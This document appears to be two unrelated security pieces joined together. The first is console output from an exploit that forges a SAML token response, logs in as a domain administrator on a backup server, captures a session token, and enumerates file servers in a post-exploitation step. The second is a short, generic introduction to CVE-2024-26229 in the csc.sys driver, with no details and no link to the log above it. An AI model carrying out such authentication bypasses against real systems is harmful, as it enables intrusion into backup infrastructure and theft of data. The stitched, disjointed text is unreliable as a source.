(*) Impersonating user: administrator@evilcorp.local
192.168.253.180 - - [10/Jun/2024 07:20:13] "POST /ims/STSService HTTP/1.1" 200 -
(+) SAML Auth request received, serving malicious RequestSecurityTokenResponseType

(+) Exploit was Successful, authenticated as administrator@evilcorp.local
(*) Got token: MmIzOGVjMzQtZGIxZC00MWE3LTgxNjMtNjA2MTE4ODY5ZDkw
(*) Starting post-exploitation phase
(*) Retrieving the list of file servers
{'FileServers': [{'ServerType': 'SmbServer', 'HierarchyObjRef': 'urn:NasBackup:FileServer:9dee6394-bf7a-4dc6-a9a5-4faf2e22551d.0d4a7862-82cb-4c93-a53b-e500d6cb9e35', 'SmbServerOptions': {'Path': '\\\\192.168.253.134\\corporate-docs', 'CredentialsId': None}, 'NfsServerOptions': None, 'FileServerOptions': None, 'ProcessingOptions': {'ServerUid': 'urn:veeam:FileServer:0d4a7862-82cb-4c93-a53b-e500d6cb9e35', 'CacheRepositoryUid': 'urn:veeam:Repository:88788f9e-d8f5-4eb4-bc4f-9b3f5403bcec'}, 'NASServerAdvancedOptions': {'ProcessingMode': 'Direct', 'StorageSnapshotPath': None}, 'Name': '\\\\192.168.253.134\\corporate-docs', 'UID': 'urn:veeam:FileServer:0d4a7862-82cb-4c93-a53b-e500d6cb9e35', 'Links': [{'Rel': 'Up', 'Href': 'https://192.168.253.180:9398/api/backupServers/e59b6cc4-444e-4a2d-a986-3d4d0b8791de', 'Name': '192.168.253.134', 'Type': 'BackupServerReference'}, {'Rel': 'Alternate', 'Href': 'https://192.168.253.180:9398/api/nas/fileServers/0d4a7862-82cb-4c93-a53b-e500d6cb9e35', 'Name': '\\\\192.168.253.134\\corporate-docs', 'Type': 'FileServerReference'}], 'Href': 'https://192.168.253.180:9398/api/nas/fileServers/0d4a7862-82cb-4c93-a53b-e500d6cb9e35?format=Entity', 'Type': 'FileServer'}]}

CVE-2024-26229 : Address Validation Flaws In IOCTL With METHOD_NEITHER

This section delves into CVE-2024-26229, a critical security vulnerability identified within the csc.sys driver, which is pivotal in handling I/O control codes.

This issue is catalogued under CWE-781, indicating a severe oversight in address validation mechanisms when utilizing METHOD_NEITHER I/O Control Codes.

Such vulnerabilities pose significant risks as they could allow attackers to execute arbitrary code within the kernel, leading to potential system takeovers.

Our discussion will cover the implications of this flaw, explore potential attack vectors, and suggest mitigation strategies to protect against exploits.

Understanding the technical nuances of CVE-2024-26229 is essential for cybersecurity professionals aiming to safeguard their systems against complex threats.

CWE-781: Improper Address Validation in IOCTL with METHOD_NEITHER I/O Control Code in the csc.sys driver